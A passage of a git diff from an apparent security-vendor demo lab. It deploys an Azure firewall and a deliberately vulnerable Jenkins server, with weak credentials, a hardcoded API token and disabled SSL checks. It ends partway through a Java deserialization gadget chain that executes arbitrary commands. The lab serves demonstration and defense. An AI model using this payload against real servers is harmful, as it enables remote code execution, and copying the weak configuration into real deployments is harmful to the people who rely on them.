+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+    # generate a unique share name to avoid overlaps in shared infra
+
+    # FIXME - Need to remove hardcoded directoty link below
+
+    d_dir = './WebInDeploy/bootstrap'
+    share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+    print('using share_name of: {}'.format(share_name))
+
+    # archive_file_path = _create_archive_directory(files, share_prefix)
+
+    try:
+        # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+        s = requests.Session()
+        s.verify = False
+
+        file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+        # print(file_service)
+        if not file_service.exists(share_name):
+            file_service.create_share(share_name)
+
+        for d in ['config', 'content', 'software', 'license']:
+            print('creating directory of type: {}'.format(d))
+            if not file_service.exists(share_name, directory_name=d):
+                file_service.create_directory(share_name, d)
+
+            # FIXME - We only handle bootstrap files.  May need to handle other dirs
+
+            if d == 'config':
+                for filename in os.listdir(d_dir):
+                    print('creating file: {0}'.format(filename))
+                    file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+    except AttributeError as ae:
+        # this can be returned on bad auth information
+        print(ae)
+        return "Authentication or other error creating bootstrap file_share in Azure"
+
+    except AzureException as ahe:
+        print(ahe)
+        return str(ahe)
+    except ValueError as ve:
+        print(ve)
+        return str(ve)
+
+    print('all done')
+    return share_name
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 15
+    while True:
+        if count < max_count:
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def main(username, password, rg_name, azure_region):
+    username = username
+    password = password
+
+    WebInBootstrap_vars = {
+        'RG_Name': rg_name,
+        'Azure_Region': azure_region
+    }
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password,
+        'Azure_Region': azure_region
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+        start_time = time.asctime()
+        print(f'Starting Deployment at {start_time}\n')
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir='./WebInBootstrap')
+
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+    return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output,
+                                            skip_plan=True, **kwargs)
+
+    resource_group = tf.output('Resource_Group')
+    bootstrap_bucket = tf.output('Bootstrap_Bucket')
+    storage_account_access_key = tf.output('Storage_Account_Access_Key')
+    web_in_bootstrap_output = tf.output()
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+    update_status('web_in_deploy_stdout', stdout)
+    update_status('web_in_bootstrap_output', web_in_bootstrap_output)
+
+    if return_code1 != 0:
+        logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstap_status', 'error')
+        update_status('web_in_bootstrap_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_bootstrap_status', 'success')
+
+    share_prefix = 'jenkins-demo'
+
+    share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+    WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+    WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+    WebInDeploy_vars.update({'RG_Name': resource_group})
+    WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+    WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+    # Build Infrastructure
+
+    tf = Terraform(working_dir='./WebInDeploy')
+    # print("vars {}".format(WebInDeploy_vars))
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False, var=WebInDeploy_vars)
+
+    return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
+                                            **kwargs)
+
+    web_in_deploy_output = tf.output()
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+    update_status('web_in_deploy_stdout', stdout)
+    update_status('web_in_deploy_output', web_in_deploy_output)
+    if return_code1 != 0:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        update_status('web_in_deploy_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_deploy_status', 'success')
+
+    albDns = tf.output('ALB-DNS')
+    fwMgt = tf.output('MGT-IP-FW-1')
+    nlbDns = tf.output('NLB-DNS')
+    fwMgtIP = tf.output('MGT-IP-FW-1')
+
+    logger.info("Got these values from output \n\n")
+    logger.info("AppGateway address is {}".format(albDns))
+    logger.info("Internal loadbalancer address is {}".format(nlbDns))
+    logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    #
+    # Check firewall is up and running
+    # #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+    logger.info("Updating firewall with latest content pack")
+
+    update_fw(fwMgtIP, api_key)
+
+    #
+    # Configure Firewall
+    #
+    WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+    tf = Terraform(working_dir='./WebInFWConf')
+    tf.cmd('init')
+    kwargs = {"auto-approve": True}
+
+    logger.info("Applying addtional config to firewall")
+
+    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+
+    if run_plan:
+        tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
+
+    # update initial vars with generated fwMgt ip
+
+    return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+                                            var=WebInFWConf_vars, **kwargs)
+
+    web_in_fw_conf_out = tf.output()
+
+    update_status('web_in_fw_conf_output', web_in_fw_conf_out)
+    # update_status('web_in_fw_conf_stdout', stdout)
+
+    logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
+
+    if return_code2 != 0:
+        logger.error("WebInFWConf failed")
+        update_status('web_in_fw_conf_status', 'error')
+        update_status('web_in_fw_conf_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_fw_conf_status', 'success')
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    # FIXME - add outputs for all 3 dirs
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+    parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    resource_group = args.resource_group
+    azure_region = args.azure_region
+
+    main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-master/destroy-old.py b/azure/Jenkins_proj-master/destroy-old.py
new file mode 100644
index 00000000..305e8925
--- /dev/null
+++ b/azure/Jenkins_proj-master/destroy-old.py
@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+git
+python destroy.py
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+    username = username
+    password = password
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    WebInBootstrap_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    albDns = ''
+    nlbDns = ''
+    fwMgt = ''
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    deployment_status = {}
+    kwargs = {"auto-approve": True}
+
+    #
+    # Destroy Infrastructure
+    #
+    tf = Terraform(working_dir='./WebInDeploy')
+    rg_name = tf.output('RG_Name')
+
+    attack_rg_name = tf.output('Attacker_RG_Name')
+    logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+    WebInDeploy_vars.update({'RG_Name': rg_name})
+    WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+    if run_plan:
+        print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+    # return_code1 =0
+    print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("Failed to destroy build ")
+
+        exit()
+    else:
+
+        logger.info("Destroyed WebInDeploy ")
+
+    WebInBootstrap_vars.update({'RG_Name': rg_name})
+    WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
+
+    tf = Terraform(working_dir='./WebInBootstrap')
+
+    if run_plan:
+        print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
+    # return_code1 =0
+    print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("WebInBootstrap destroyed")
+        deployment_status = {'WebInDeploy': 'Fail'}
+
+        exit()
+    else:
+        deployment_status = {'WebInDeploy': 'Success'}
+        exit()
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+
+    main(username, password)
diff --git a/azure/Jenkins_proj-master/destroy.py b/azure/Jenkins_proj-master/destroy.py
index 305e8925..3bc6b81b 100644
--- a/azure/Jenkins_proj-master/destroy.py
+++ b/azure/Jenkins_proj-master/destroy.py
@@ -1,121 +1,125 @@
-#!/usr/bin/env python3
-"""
-# Copyright (c) 2018, Palo Alto Networks
-#
-# Permission to use, copy, modify, and/or distribute this software for any
-# purpose with or without fee is hereby granted, provided that the above
-# copyright notice and this permission notice appear in all copies.
-#
-# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
-# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
-# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
-# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
-# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
-# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
-# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
-# Author: Justin Harris jharris@paloaltonetworks.com
-
-Usage:
-git
-python destroy.py
-
-"""
 
+from azure.cli.core import get_default_cli
+import sys
+import tempfile
 import argparse
 import logging
+import subprocess
+import os
 
 from python_terraform import Terraform
 
 logger = logging.getLogger()
-handler = logging.StreamHandler()
-formatter = logging.Formatter('%(levelname)-8s %(message)s')
-handler.setFormatter(formatter)
-logger.addHandler(handler)
+# handler = logging.StreamHandler()
+# formatter = logging.Formatter('%(levelname)-8s %(message)s')
+# handler.setFormatter(formatter)
+# logger.addHandler(handler)
 logger.setLevel(logging.INFO)
 
 
-def main(username, password):
-    username = username
-    password = password
+#
+# Usage azure_login.py -g rgname
+#
 
-    WebInDeploy_vars = {
-        'Admin_Username': username,
-        'Admin_Password': password
-    }
+sys.sterr = sys.stdout
 
-    WebInBootstrap_vars = {
-        'Admin_Username': username,
-        'Admin_Password': password
-    }
+print('Logging in to Azure using device code')
 
-    albDns = ''
-    nlbDns = ''
-    fwMgt = ''
+def run_cmd(cmd):
+    subprocess.call('az login', shell=True)
+    res = subprocess.call(cmd, shell=True)
+    print ('Result is {}'.format(res))
 
-    # Set run_plan to TRUE is you wish to run terraform plan before apply
-    run_plan = False
-    deployment_status = {}
-    kwargs = {"auto-approve": True}
 
+def delete_file(fpath):
+    if os.path.exists(fpath):
+        try:
+            os.remove(fpath)
+            print ('Removed state file {}'.format(fpath))
+        except Exception as e:
+            print ('Unable to delete the file {} got error {}'.format(fpath, e))
+    else:
+        print('No need to delete {} as it no longer exists'.format(fpath))
+
+def az_cli(args_str):
+    temp = tempfile.TemporaryFile()
+    args = args_str.split()
+    logger.debug('Sending cli command {}'.format(args))
+    code = get_default_cli().invoke(args, None, temp)
+    # temp.seek(0)
+    data = temp.read().strip()
+    temp.close()
+    return [code, data]
+
+def delete_rg(rg_name):
+    logger.info('Deleting resource group {}'.format(rg_name))
+    cmd = 'group delete --name ' + rg_name + ' --yes'
+    code, data = az_cli(cmd)
+    if code == 0:
+        print ('Successfully deleted Rg {} {}'.format(code,rg_name))
+
+def delete_state_files(working_dir, file_list):
+    """
+
+    :param working_dir: string
+    :param tfstate_files: list of files
+    :return: True or False
+
+    Removes a list of files from a directory
+
+    """
+    for file_name in file_list:
+        fpath = working_dir + file_name
+        if os.path.exists(fpath):
+            delete_file(fpath)
+        else:
+            print('Already deleted file {}'.format(fpath))
+
+def main (username, password):
+    #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
     #
     # Destroy Infrastructure
     #
-    tf = Terraform(working_dir='./WebInDeploy')
-    rg_name = tf.output('RG_Name')
-
-    attack_rg_name = tf.output('Attacker_RG_Name')
-    logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
-
-    WebInDeploy_vars.update({'RG_Name': rg_name})
-    WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
-
-    if run_plan:
-        print('Calling tf.plan')
-        tf.plan(capture_output=False)
-
-    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
-    # return_code1 =0
-    print('Got return code {}'.format(return_code1))
-
-    if return_code1 != 0:
-        logger.info("Failed to destroy build ")
-
-        exit()
-    else:
-
-        logger.info("Destroyed WebInDeploy ")
+    tfstate_file = 'terraform.tfstate'
+    tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup']
+
+    fpath = './WebInDeploy/' + tfstate_file
+    if os.path.isfile(fpath):
+        tf = Terraform(working_dir='./WebInDeploy')
+        rg_name = tf.output('RG_Name')
+        rg_name1 = tf.output('Attacker_RG_Name')
+        delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes'
+        az_cli(delete_rg_cmd)
+    #
+    # Delete state files WebInDeploy
+    #
+    delete_state_files('./WebInDeploy/', tfstate_files)
 
-    WebInBootstrap_vars.update({'RG_Name': rg_name})
-    WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
 
-    tf = Terraform(working_dir='./WebInBootstrap')
+    fpath = './WebInBootstrap/' + tfstate_file
+    if os.path.isfile(fpath):
+        delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes'
+        az_cli(delete_rg_cmd)
+    #
+    # Delete state files WebInBootstrap
+    #
+    delete_state_files('./WebInBootstrap/', tfstate_files)
 
-    if run_plan:
-        print('Calling tf.plan')
-        tf.plan(capture_output=False)
 
-    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
-    # return_code1 =0
-    print('Got return code {}'.format(return_code1))
+    #
+    # Delete state files WebInFWConf
+    #
+    delete_state_files('./WebInFWConf/', tfstate_files)
 
-    if return_code1 != 0:
-        logger.info("WebInBootstrap destroyed")
-        deployment_status = {'WebInDeploy': 'Fail'}
 
-        exit()
-    else:
-        deployment_status = {'WebInDeploy': 'Success'}
-        exit()
 
 
 if __name__ == '__main__':
     parser = argparse.ArgumentParser(description='Get Terraform Params')
     parser.add_argument('-u', '--username', help='Firewall Username', required=True)
     parser.add_argument('-p', '--password', help='Firewall Password', required=True)
-
     args = parser.parse_args()
     username = args.username
     password = args.password
-
+    # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
     main(username, password)
diff --git a/azure/Jenkins_proj-master/jenkins/Dockerfile b/azure/Jenkins_proj-master/jenkins/Dockerfile
new file mode 100644
index 00000000..1dea80e9
--- /dev/null
+++ b/azure/Jenkins_proj-master/jenkins/Dockerfile
@@ -0,0 +1,38 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/*
+
+
+ENV JENKINS_HOME /var/jenkins_home
+ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log
+
+RUN groupadd -g 1000 jenkins \
+    && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \
+    && adduser jenkins sudo \
+    && echo 'jenkins:jenkins' | chpasswd
+    
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+ENV JENKINS_VERSION 2.32.1
+RUN set -ex \
+    && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \
+    && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \
+    && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
+    && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref
+
+EXPOSE 8080
+EXPOSE 50000
+
+COPY jenkins.sh /usr/local/bin/jenkins.sh
+
+RUN chmod +x /usr/local/bin/jenkins.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+
+CMD ["/usr/local/bin/jenkins.sh"]
diff --git a/azure/Jenkins_proj-master/jenkins/config.xml b/azure/Jenkins_proj-master/jenkins/config.xml
new file mode 100644
index 00000000..071c4fb7
--- /dev/null
+++ b/azure/Jenkins_proj-master/jenkins/config.xml
@@ -0,0 +1,35 @@
+<?xml version='1.0' encoding='UTF-8'?>
+<user>
+  <fullName>admin admin</fullName>
+  <properties>
+    <jenkins.security.ApiTokenProperty>
+      <apiToken>N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq</apiToken>
+    </jenkins.security.ApiTokenProperty>
+    <hudson.model.MyViewsProperty>
+      <views>
+        <hudson.model.AllView>
+          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
+          <name>All</name>
+          <filterExecutors>false</filterExecutors>
+          <filterQueue>false</filterQueue>
+          <properties class="hudson.model.View$PropertyList"/>
+        </hudson.model.AllView>
+      </views>
+    </hudson.model.MyViewsProperty>
+    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">
+      <providerId>default</providerId>
+    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
+    <hudson.model.PaneStatusProperties>
+      <collapsed/>
+    </hudson.model.PaneStatusProperties>
+    <hudson.search.UserSearchProperty>
+      <insensitiveSearch>false</insensitiveSearch>
+    </hudson.search.UserSearchProperty>
+    <hudson.security.HudsonPrivateSecurityRealm_-Details>
+      <passwordHash>bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46</passwordHash>
+    </hudson.security.HudsonPrivateSecurityRealm_-Details>
+    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.22">
+      <emailAddress>admin@admin.com</emailAddress>
+    </hudson.tasks.Mailer_-UserProperty>
+  </properties>
+</user>
diff --git a/azure/Jenkins_proj-master/jenkins/docker-compose.yml b/azure/Jenkins_proj-master/jenkins/docker-compose.yml
new file mode 100644
index 00000000..61334042
--- /dev/null
+++ b/azure/Jenkins_proj-master/jenkins/docker-compose.yml
@@ -0,0 +1,11 @@
+version: '3'
+services:
+  jenkins:
+    build: .
+    container_name: jenkins
+    environment:
+      JAVA_OPTS: "-Djava.awt.headless=true"
+      JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
+    ports:
+      - "50000:50000"
+      - "8080:8080"
diff --git a/azure/Jenkins_proj-master/jenkins/jenkins.sh b/azure/Jenkins_proj-master/jenkins/jenkins.sh
new file mode 100644
index 00000000..b44f6ba2
--- /dev/null
+++ b/azure/Jenkins_proj-master/jenkins/jenkins.sh
@@ -0,0 +1,24 @@
+#! /bin/bash -e
+
+: "${JENKINS_HOME:="/var/jenkins_home"}"
+touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
+echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
+
+# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+  # read JAVA_OPTS and JENKINS_OPTS into arrays
+  java_opts_array=()
+  while IFS= read -r -d '' item; do
+    java_opts_array+=( "$item" )
+  done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
+
+  jenkins_opts_array=( )
+  while IFS= read -r -d '' item; do
+    jenkins_opts_array+=( "$item" )
+  done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
+
+  exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-master/jenkins/tini b/azure/Jenkins_proj-master/jenkins/tini
new file mode 100644
index 00000000..4e5b36a9
Binary files /dev/null and b/azure/Jenkins_proj-master/jenkins/tini differ
diff --git a/azure/Jenkins_proj-master/payload/Payload.java b/azure/Jenkins_proj-master/payload/Payload.java
new file mode 100644
index 00000000..cbd4c8b5
--- /dev/null
+++ b/azure/Jenkins_proj-master/payload/Payload.java
@@ -0,0 +1,189 @@
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+ 
+import net.sf.json.JSONArray;
+ 
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+ 
+public class Payload implements Serializable {
+ 
+    private Serializable payload;
+ 
+    public Payload(String cmd) throws Exception {
+ 
+        this.payload = this.setup(cmd);
+ 
+    }
+ 
+    public Serializable setup(String cmd) throws Exception {
+        final String[] execArgs = new String[] { cmd };
+ 
+        final Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        execArgs), new ConstantTransformer(1) };
+ 
+        Transformer transformerChain = new ChainedTransformer(transformers);
+ 
+        final Map innerMap = new HashMap();
+ 
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+ 
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+ 
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException e) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+ 
+        f.setAccessible(true);
+        HashMap innimpl = (HashMap) f.get(map);
+ 
+        Field f2 = null;
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException e) {
